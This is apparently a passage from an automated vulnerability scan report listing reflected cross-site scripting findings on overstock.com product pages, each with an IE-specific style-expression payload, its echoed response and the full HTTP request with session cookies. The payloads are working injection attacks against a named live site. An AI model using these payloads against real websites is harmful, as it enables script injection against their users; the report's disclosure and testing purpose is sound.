GET /Home-Garden/Dyson-DC17-Animal-Upright-Vacuum-Refurbished/3037773/product.html?3e838"style%3d"x%3aexpression(alert(1))"1b4ef56732d=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.196. http://www.overstock.com/Home-Garden/Dyson-DC17-Asthma-and-Allergy-Vacuum-Refurbished/3513451/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f499e"style%3d"x%3aexpression(alert(1))"956a8fa0588 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f499e"style="x:expression(alert(1))"956a8fa0588 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Dyson-DC17-Asthma-and-Allergy-Vacuum-Refurbished/3513451/product.html?f499e"style%3d"x%3aexpression(alert(1))"956a8fa0588=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.197. http://www.overstock.com/Home-Garden/Dyson-DC24-All-Floors-Vacuum-New/3938757/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e782b"style%3d"x%3aexpression(alert(1))"31acb8c8b1e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e782b"style="x:expression(alert(1))"31acb8c8b1e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Dyson-DC24-All-Floors-Vacuum-New/3938757/product.html?e782b"style%3d"x%3aexpression(alert(1))"31acb8c8b1e=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.198. http://www.overstock.com/Home-Garden/Dyson-DC25-All-Floors-Upright-Vacuum-New/3938758/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e31f7"style%3d"x%3aexpression(alert(1))"d9761fcbed9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e31f7"style="x:expression(alert(1))"d9761fcbed9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Dyson-DC25-All-Floors-Upright-Vacuum-New/3938758/product.html?e31f7"style%3d"x%3aexpression(alert(1))"d9761fcbed9=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.199. http://www.overstock.com/Home-Garden/Dyson-DC25-All-floor-Vacuum-Refurbished/4226792/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f935"style%3d"x%3aexpression(alert(1))"d4c9f06adbc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9f935"style="x:expression(alert(1))"d4c9f06adbc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Dyson-DC25-All-floor-Vacuum-Refurbished/4226792/product.html?9f935"style%3d"x%3aexpression(alert(1))"d4c9f06adbc=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.200. http://www.overstock.com/Home-Garden/Dyson-DC25-Animal-Vacuum-New/3938759/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c0e8"style%3d"x%3aexpression(alert(1))"c87de37f669 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3c0e8"style="x:expression(alert(1))"c87de37f669 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Dyson-DC25-Animal-Vacuum-New/3938759/product.html?3c0e8"style%3d"x%3aexpression(alert(1))"c87de37f669=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.201. http://www.overstock.com/Home-Garden/Dyson-DC25-Animal-Vacuum-Refurbished/4233160/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a18ea"style%3d"x%3aexpression(alert(1))"a87b2d010e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a18ea"style="x:expression(alert(1))"a87b2d010e1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Dyson-DC25-Animal-Vacuum-Refurbished/4233160/product.html?a18ea"style%3d"x%3aexpression(alert(1))"a87b2d010e1=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.202. http://www.overstock.com/Home-Garden/Earthwise-Cordless-Blower/4123289/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b77df"style%3d"x%3aexpression(alert(1))"6a9a7853627 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b77df"style="x:expression(alert(1))"6a9a7853627 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Earthwise-Cordless-Blower/4123289/product.html?b77df"style%3d"x%3aexpression(alert(1))"6a9a7853627=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.203. http://www.overstock.com/Home-Garden/Ebony-Laptop-Storage-Desk/4026931/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 641c8"style%3d"x%3aexpression(alert(1))"6579dee90f6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 641c8"style="x:expression(alert(1))"6579dee90f6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Ebony-Laptop-Storage-Desk/4026931/product.html?641c8"style%3d"x%3aexpression(alert(1))"6579dee90f6=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.204. http://www.overstock.com/Home-Garden/Eco-friendly-3-inch-Contoured-Memory-Foam-Mattress-Topper/4103858/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf187"style%3d"x%3aexpression(alert(1))"ae2dc8572f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf187"style="x:expression(alert(1))"ae2dc8572f9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Eco-friendly-3-inch-Contoured-Memory-Foam-Mattress-Topper/4103858/product.html?bf187"style%3d"x%3aexpression(alert(1))"ae2dc8572f9=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.205. http://www.overstock.com/Home-Garden/Egyptian-Cotton-1000-Thread-Count-Sateen-Sheet-Set/5120556/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a57ec"style%3d"x%3aexpression(alert(1))"d4d83d50b96 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a57ec"style="x:expression(alert(1))"d4d83d50b96 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Egyptian-Cotton-1000-Thread-Count-Sateen-Sheet-Set/5120556/product.html?a57ec"style%3d"x%3aexpression(alert(1))"d4d83d50b96=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.206. http://www.overstock.com/Home-Garden/Egyptian-Cotton-1000-Thread-Count-Solid-Sheet-Set/2686600/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7962"style%3d"x%3aexpression(alert(1))"83e1660a2ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c7962"style="x:expression(alert(1))"83e1660a2ba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Egyptian-Cotton-1000-Thread-Count-Solid-Sheet-Set/2686600/product.html?c7962"style%3d"x%3aexpression(alert(1))"83e1660a2ba=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.207. http://www.overstock.com/Home-Garden/Egyptian-Cotton-1200-Thread-Count-Solid-Sheet-Set/2675824/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7043"style%3d"x%3aexpression(alert(1))"2eee86a2cf0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d7043"style="x:expression(alert(1))"2eee86a2cf0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Egyptian-Cotton-1200-Thread-Count-Solid-Sheet-Set/2675824/product.html?d7043"style%3d"x%3aexpression(alert(1))"2eee86a2cf0=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.208. http://www.overstock.com/Home-Garden/Egyptian-Cotton-1500-Thread-Count-Solid-Sheet-Set/3355823/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97233"style%3d"x%3aexpression(alert(1))"5caac51a1a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 97233"style="x:expression(alert(1))"5caac51a1a5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Egyptian-Cotton-1500-Thread-Count-Solid-Sheet-Set/3355823/product.html?97233"style%3d"x%3aexpression(alert(1))"5caac51a1a5=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.209. http://www.overstock.com/Home-Garden/Egyptian-Cotton-300-Thread-Count-Sheet-Set/4662568/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fac04"style%3d"x%3aexpression(alert(1))"9b2ad2d9764 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fac04"style="x:expression(alert(1))"9b2ad2d9764 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
